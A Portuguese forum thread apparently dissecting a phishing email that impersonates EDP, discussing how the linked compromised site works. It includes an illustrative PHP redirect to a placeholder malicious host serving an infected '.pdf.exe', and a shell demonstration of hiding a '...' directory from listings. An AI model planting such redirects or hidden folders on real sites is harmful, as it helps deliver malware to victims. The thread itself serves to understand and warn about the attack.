URL malicioso em e-mail

[donatello]

Boas! Como estão?  👍

Como muitos devem saber há por aí um e-mail com falsa origem na EDP com URL para sítio comprometido.

A minha dúvida tem a ver com o URL ?completo? ou seja, isto:

<A href=3D"http://nome-do-sitio-comprometido.pt/images/fotos/.../index.php?http://www.edp.pt=" title=3D"Visualizar 100001223519.pdf" >

1) O que é /.../ ?

2) Como se pode explicar que em nome-do-sitio-comprometido.pt/images/fotos/ não poder haver mais nenhuma pasta ou, na pasta fotos, não haver ficheiros .exe ou .pdf?

Há meio mundo a querer lixar a outra metade  ?   🙂

Fiquem bem!

[softklin]

Se isso corresponder à imagem apresentada num artigo do Pplware, isso pode não ser o caminho completo, mas sim abreviado pelo software de correio eletrónico, tal como o Chrome ou o Firefox o fazem nas suas versões mais recentes (experimenta passar o cursor num link mais comprido e repara que aparecem as reticências pelo meio) Na verdade, o endereço deve ser maior.

Quanto à tua segunda dúvida, não te esqueças que uma pasta não passa disso, independentemente do nome. O que me parece ter acontecido é que foi usado um script PHP que estava vulnerável/usado propositadamente para redirecionar para um download do tal ficheiro infetado. Algo assim:

http://example.com/imagens/fotos/whatever/index.php?http://www.edp.pt

(repara que onde está o endereço da EDP pode não alterar em nada o link; provavelmente foi usado para iludir as pessoas que esse endereço as levava para lá)

<?php
  header('Location: http://host-malicioso.com/ficheiro-infetado.pdf.exe');
?>

Quando a pessoa visitasse o link anterior, iria ser imediatamente redirecionada para o endereço que está no código.

Não recebi esse email, mas deixo já a minha opinião: pelo estilo de escrita cuidado, parece-me que esse ataque foi feito por alguém português. Digo isto porque já andam por aí burlas de que a polícia judiciária tinha multado utilizadores por verem pornografia, mas nesse caso eram emails em massa lançados para diversos países, mudando apenas o valor do resgate e a entidade que enviava o email (a tradução era muito pobre). Neste caso da EDP, houve todo o cuidado de fazer parecer o email legítimo.

[donatello]

Boas,

Se isso corresponder à imagem apresentada num artigo do Pplware, isso pode não ser o caminho completo, mas sim abreviado pelo software de correio eletrónico, tal como o Chrome ou o Firefox o fazem nas suas versões mais recentes (experimenta passar o cursor num link mais comprido e repara que aparecem as reticências pelo meio) Na verdade, o endereço deve ser maior.

Mas vendo o código-fonte da mensagem é qualquer coisa assim:

<p><A href="http://dominio.pt/images/fotos/.../index.php?http://www.edp.pt" title="Visualizar 100001223519.pdf" ><IMG src="http://www.bportugal.p=t/SiteCollectionImages/icon_pdf.gif" alt="" width="16" height="16" border="0" title="application/pdf">4563154321.pdf (380 KB)</A></p>

Sim, vi no Pplware mas também há mais em http://www.websegura.net/2012/03/fraude-usa-envio-de-fatura-eletronica-da-edp/.

[softklin]

Estive a ler uns RFC, mas não vi nenhuma referência válida a /.../ neste contexto. No entanto, ao fazer uns testes práticos, creio que cheguei a uma conclusão:

No Windows, se tentares criar uma pasta com esse nome (...) quer na linha de comandos, quer pelo Explorer, não te é permitido (testei no W7). Já no Linux, é-te permitida a criação desta pasta, e na verdade tem um significado especial: estás a criar uma pasta oculta, com o nome .. (o primeiro . indica que é oculta, os seguintes indicam o nome). Isto funciona perfeitamente:

Estou numa pasta chamada teste, na qual faço uma listagem, seguida da criação da tal pasta "...". Essa pasta só me aparece se pedir explicitamente os ficheiros ocultos na listagem.

softklin@mint-vm ~/teste $ ls
ficheiro
softklin@mint-vm ~/teste $ mkdir ...
softklin@mint-vm ~/teste $ ls
ficheiro
softklin@mint-vm ~/teste $ ls -a
.  ..  ...  ficheiro
softklin@mint-vm ~/teste $ cd ...
softklin@mint-vm ~/teste/... $ mkdir lol
softklin@mint-vm ~/teste/... $ cd lol
softklin@mint-vm ~/teste/.../lol $ pwd
/home/softklin/teste/.../lol

Se o host em causa estiver a correr uma distro Linux, parece-me que o nome da pasta teve como objetivo camuflar a sua existência numa listagem (pois existe a pasta "." (pasta atual) e ".." (pasta anterior)). Um utilizador novato em Linux provavelmente não desconfiaria da existência de uma pasta "..." quando lhe aparecesse numa listagem.

Quanto ao protocolo HTTP, não consigo encontrar nenhuma referência, por isso acredito que seja por este motivo que apresentei. Mas se não for, sintam-se à vontade para corrigir.

[donatello]

Obrigado pela ajuda.

Deve ser isso, ocultação de pasta. Até porque a imagem de logo PDF que vai buscar ao http://www.bportugal.pt/SiteCollectionImages/icon_pdf.gif não é assim tão curto.

Sabes-me dizer, no caso da ocultação da pasta, se essa ocultação consegue ser feita para visualização das pastas por FTP, por exemplo através do FileZilla?

Outra coisa, acho que o site permitia a listagem de pastas e ficheiros em pasta sem ficheiro index (ou default, etc.). Nesse caso, o acesso ao conteúdo (por browser), e visualização de pastas e ficheiros, do site estavam acessíveis mas a pasta com o conteúdo malicioso não...

[softklin]

Sim, pode ocultar também no FTP. Mas creio que o Filezilla, por defeito, mostra todos os ficheiros, mesmo os ocultos (existe a opção Server > Force show hidden files). Quanto à listagem na web, penso que sim, também ficam ocultos. Os ficheiros .htaccess (ponto htaccess), por exemplo, também não são listados.

Eu não tenho a certeza se a motivação do atacante foi essa, mas parece-me o mais lógico. OU isso, ou não tinha imaginação nenhuma, e meteu para lá umas reticências 😉

[donatello]

Eu não tenho a certeza se a motivação do atacante foi essa, mas parece-me o mais lógico. OU isso, ou não tinha imaginação nenhuma, e meteu para lá umas reticências 🙂

Vamos pela ocultação intencional...  😉